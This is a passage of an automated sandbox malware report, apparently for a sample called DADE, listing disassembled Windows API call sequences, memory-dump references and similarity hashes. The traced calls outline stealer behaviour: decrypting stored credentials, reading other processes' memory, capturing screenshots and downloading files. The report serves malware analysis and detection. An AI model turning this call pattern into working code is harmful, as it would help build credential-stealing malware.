                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A174
                                                      • SetEnvironmentVariableA.KERNEL32(00A76A20,00000000), ref: 0040A18F
                                                      • LoadLibraryA.KERNEL32(00A55CD8), ref: 0040A1A3
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 2929475105-0
                                                      • Opcode ID: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
                                                      • Instruction ID: 94f9c8f72257bf504f41825e736cba288604a750adbbaa2107b6746afa8b652b
                                                      • Opcode Fuzzy Hash: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
                                                      • Instruction Fuzzy Hash: E491B231600B009FC7209FA4DC44AA736A6EB44709F40517AF805AB3E1EBBDDD918BD6
                                                      APIs
                                                      • GetEnvironmentVariableA.KERNEL32(006388B4,00639BD8,0000FFFF), ref: 009DA2ED
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009DA31A
                                                      • lstrlen.KERNEL32(00639BD8), ref: 009DA327
                                                      • lstrcpy.KERNEL32(00000000,00639BD8), ref: 009DA351
                                                      • lstrlen.KERNEL32(00435210), ref: 009DA35C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009DA379
                                                      • lstrcat.KERNEL32(00000000,00435210), ref: 009DA385
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009DA3AB
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 009DA3B6
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009DA3DB
                                                      • SetEnvironmentVariableA.KERNEL32(006388B4,00000000), ref: 009DA3F6
                                                      • LoadLibraryA.KERNEL32(00638D78), ref: 009DA40A
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 2929475105-0
                                                      • Opcode ID: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
                                                      • Instruction ID: 42691c9f34953e31863a4ce5c298e320f3f8ab29da720fefc9517fc24cfd8ee6
                                                      • Opcode Fuzzy Hash: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
                                                      • Instruction Fuzzy Hash: AA91C270640B009FD7309FA4DC84AAA37BAEB95705F50942BF805877A1EBB9DD50CBD2
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040BD0F
                                                      • lstrlenA.KERNEL32(00000000), ref: 0040BD42
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD6C
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BD74
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD9C
                                                      • lstrlenA.KERNEL32(0043509C), ref: 0040BE13
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$lstrcat
                                                      • String ID:
                                                      • API String ID: 2500673778-0
                                                      • Opcode ID: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
                                                      • Instruction ID: 76368cc7b8b4fa27ce7ffa11b26ea8b40865ffa98968743eda1335703526e589
                                                      • Opcode Fuzzy Hash: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
                                                      • Instruction Fuzzy Hash: B4A13D71A012058FCB14DF29C949A9BB7B1EF44304F14847AE405AB3E1DB79DC42CBD8
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009D79AC
                                                      • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 009D79F1
                                                      • strlen.MSVCRT ref: 009D7A25
                                                      • StrStrA.SHLWAPI(?,0043508C), ref: 009D7A5F
                                                      • strlen.MSVCRT ref: 009D7AF4
                                                        • Part of subcall function 009D78F7: GetProcessHeap.KERNEL32(00000008,00000400), ref: 009D7905
                                                        • Part of subcall function 009D78F7: RtlAllocateHeap.NTDLL(00000000), ref: 009D790C
                                                        • Part of subcall function 009D78F7: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009D7934
                                                        • Part of subcall function 009D78F7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 009D7954
                                                        • Part of subcall function 009D78F7: LocalFree.KERNEL32(?), ref: 009D795E
                                                      • strcpy_s.MSVCRT ref: 009D7A88
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D7A93
                                                      • HeapFree.KERNEL32(00000000), ref: 009D7A9A
                                                      • strlen.MSVCRT ref: 009D7AA7
                                                      • strcpy_s.MSVCRT ref: 009D7AD1
                                                      • strlen.MSVCRT ref: 009D7B1B
                                                      • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 009D7BDC
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                                      • String ID:
                                                      • API String ID: 225686516-0
                                                      • Opcode ID: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
                                                      • Instruction ID: 1008640da40842b6333d5c40f1c5c1b1dc7c04958e332b3a0753ad64280539de
                                                      • Opcode Fuzzy Hash: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
                                                      • Instruction Fuzzy Hash: B5811CB1D002199FCB10DF94DC84ADEFBB9EF48304F1085AAE509A7250EB759A85CBA1
                                                      APIs
                                                      • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009EEB35
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EEB67
                                                      • lstrcat.KERNEL32(?,00000000), ref: 009EEB73
                                                      • lstrcat.KERNEL32(?,004354E4), ref: 009EEB8A
                                                      • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009EEBF3
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EEC27
                                                      • lstrcat.KERNEL32(?,00000000), ref: 009EEC33
                                                      • lstrcat.KERNEL32(?,00435504), ref: 009EEC4A
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009EECB8
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EECE9
                                                      • lstrcat.KERNEL32(?,00000000), ref: 009EECF5
                                                      • lstrcat.KERNEL32(?,00435518), ref: 009EED0C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$FolderPathlstrcpy
                                                      • String ID:
                                                      • API String ID: 818526691-0
                                                      • Opcode ID: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
                                                      • Instruction ID: 36f8c1d72dafcda47e664eb61dbabdbe734509f7513e2f169e515f1a4d8d6164
                                                      • Opcode Fuzzy Hash: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
                                                      • Instruction Fuzzy Hash: 2761F871644344ABD324EF60DC46FEE77A5EFC8700F50881AB68997291DBB4D908CB96
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 00418263
                                                      • lstrlenA.KERNEL32(00000000), ref: 0041829C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004182D3
                                                      • lstrlenA.KERNEL32(00000000), ref: 004182F0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00418327
                                                      • lstrlenA.KERNEL32(00000000), ref: 00418344
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0041837B
                                                      • lstrlenA.KERNEL32(00000000), ref: 00418398
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004183C7
                                                      • lstrlenA.KERNEL32(00000000), ref: 004183E1
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00418410
                                                      • strtok_s.MSVCRT ref: 0041842A
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpylstrlen$strtok_s
                                                      • String ID:
                                                      • API String ID: 2211830134-0
                                                      • Opcode ID: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
                                                      • Instruction ID: 84294ead90c4b52274de6bcb271b081bded899c4d10f8e28530b9caff154e1d2
                                                      • Opcode Fuzzy Hash: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
                                                      • Instruction Fuzzy Hash: F3516F716006139BDB149F39D948AABB7A5EF04340F10412AEC05E7384EF78E991CBE4
                                                      APIs
                                                      • ??_U@YAPAXI@Z.MSVCRT(00064000,?,00000000), ref: 009F25F8
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F2633
                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 009F2644
                                                      • memset.MSVCRT ref: 009F266C
                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 009F26C3
                                                      • lstrlen.KERNEL32(00000000), ref: 009F26D0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009F2757
                                                      • lstrlen.KERNEL32(00000000), ref: 009F275E
                                                      • strlen.MSVCRT ref: 009F2782
                                                      • memset.MSVCRT ref: 009F280C
                                                      • ??_V@YAXPAX@Z.MSVCRT(009F28C8), ref: 009F2859
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Processlstrcpylstrlenmemset$MemoryOpenReadstrlen
                                                      • String ID:
                                                      • API String ID: 311138045-0
                                                      • Opcode ID: 3dad72c2da892f3080a59da44b1c2af1ce4d3e6b4a562fa2674e328277ba50e0
                                                      • Instruction ID: 22ebb8145982e5eeed5956b89e5e2a37107b5a853eb7e7999834f562216a4297
                                                      • Opcode Fuzzy Hash: 3dad72c2da892f3080a59da44b1c2af1ce4d3e6b4a562fa2674e328277ba50e0
                                                      • Instruction Fuzzy Hash: 7181A370E003099BDB24DF94DC44BAEB7B9EF84314F248079E605A7381EB79A942CF95
                                                      APIs
                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009F44CB
                                                      • GetDesktopWindow.USER32 ref: 009F44D5
                                                      • GetWindowRect.USER32(00000000,?), ref: 009F44E3
                                                      • SelectObject.GDI32(00000000,00000000), ref: 009F451A
                                                      • GetHGlobalFromStream.COMBASE(?,?), ref: 009F459C
                                                      • GlobalLock.KERNEL32(?), ref: 009F45A7
                                                      • GlobalSize.KERNEL32(?), ref: 009F45B6
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                                      • String ID:
                                                      • API String ID: 1264946473-0
                                                      • Opcode ID: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
                                                      • Instruction ID: c3b0a209ffb3519938b826d3e0c36c3d6c8bc4c1acadc54356903c50d8d17b81
                                                      • Opcode Fuzzy Hash: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
                                                      • Instruction Fuzzy Hash: A3511AB1114344AFD310EF64DC89EABBBE9EF89714F00491EFA5593250DB74E905CBA2
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00406A3F
                                                      • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406A6C
                                                      • StrCmpCA.SHLWAPI(?,00A7FF78), ref: 00406A8A
                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406AAA
                                                      • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406AC8
                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406AE1
                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406B06
                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406B30
                                                      • CloseHandle.KERNEL32(00000000), ref: 00406B50
                                                      • InternetCloseHandle.WININET(00000000), ref: 00406B57
                                                      • InternetCloseHandle.WININET(?), ref: 00406B61
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                                      • String ID:
                                                      • API String ID: 2500263513-0
                                                      • Opcode ID: 885081f6fd0acedf355e9bb4124bd6bae7afd19d039d18dcdc55a63b4105ae60
                                                      • Instruction ID: 214ef142a420c546876de0997919582a0985ebf66699d200bad1b39cea3fe35b
                                                      • Opcode Fuzzy Hash: 885081f6fd0acedf355e9bb4124bd6bae7afd19d039d18dcdc55a63b4105ae60
                                                      • Instruction Fuzzy Hash: D2417EB1B00215ABDB20DF64DC49FAE77B9AB44704F104569FA05F72C0DBB4AA418BA8
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D6CA6
                                                      • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 009D6CD3
                                                      • StrCmpCA.SHLWAPI(?,00638C80), ref: 009D6CF1
                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 009D6D11
                                                      • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009D6D2F
                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 009D6D48
                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 009D6D6D
                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 009D6D97
                                                      • CloseHandle.KERNEL32(00000000), ref: 009D6DB7
                                                      • InternetCloseHandle.WININET(00000000), ref: 009D6DBE
                                                      • InternetCloseHandle.WININET(?), ref: 009D6DC8
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                                      • String ID:
                                                      • API String ID: 2500263513-0
                                                      • Opcode ID: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
                                                      • Instruction ID: 48690801162dcb1ea9cfd74751384dc0a5bf3bab039a6f433e9f6ec2e2cd7346
                                                      • Opcode Fuzzy Hash: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
                                                      • Instruction Fuzzy Hash: 85415CB1A40215AFDB20DF64DC45FAE77BEEB54700F108459FA05E7280DF74AA448BA4
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(0043573C,?,009E79A8), ref: 009F4A6D
                                                      • GetProcAddress.KERNEL32(00000000,00435748), ref: 009F4A83
                                                      • GetProcAddress.KERNEL32(00000000,00435750), ref: 009F4A94
                                                      • GetProcAddress.KERNEL32(00000000,0043575C), ref: 009F4AA5
                                                      • GetProcAddress.KERNEL32(00000000,00435768), ref: 009F4AB6
                                                      • GetProcAddress.KERNEL32(00000000,00435770), ref: 009F4AC7
                                                      • GetProcAddress.KERNEL32(00000000,0043577C), ref: 009F4AD8
                                                      • GetProcAddress.KERNEL32(00000000,00435784), ref: 009F4AE9
                                                      • GetProcAddress.KERNEL32(00000000,0043578C), ref: 009F4AFA
                                                      • GetProcAddress.KERNEL32(00000000,0043579C), ref: 009F4B0B
                                                      • GetProcAddress.KERNEL32(00000000,004357A8), ref: 009F4B1C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 2238633743-0
                                                      • Opcode ID: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
                                                      • Instruction ID: 1513aacd4e648272eb2169e48f2824864872acbe43933b002d938297e610fd22
                                                      • Opcode Fuzzy Hash: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
                                                      • Instruction Fuzzy Hash: 3911A576951720EF8714AFB5AD4DA9A3ABABA0E70AB14381BF151D3160DBF84004DFE4
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 00418105
                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 0041814B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0041817A
                                                      • StrCmpCA.SHLWAPI(00000000,00435204,?,?,?,?,?,0042093B), ref: 00418192
                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 004181D0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004181FF
                                                      • strtok_s.MSVCRT ref: 0041820F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpylstrlenstrtok_s
                                                      • String ID: ;B$fplugins
                                                      • API String ID: 3280532728-1193078497
                                                      • Opcode ID: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
                                                      • Instruction ID: 7bc27923b6a5a417a1ea9fc553f6de9f23466f0c50f763b4e3e6f257422fb611
                                                      • Opcode Fuzzy Hash: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
                                                      • Instruction Fuzzy Hash: 2741A275600206AFCB21DF68D948BABBBF4EF44700F11415EE855E7254EF78D981CB94
                                                      APIs
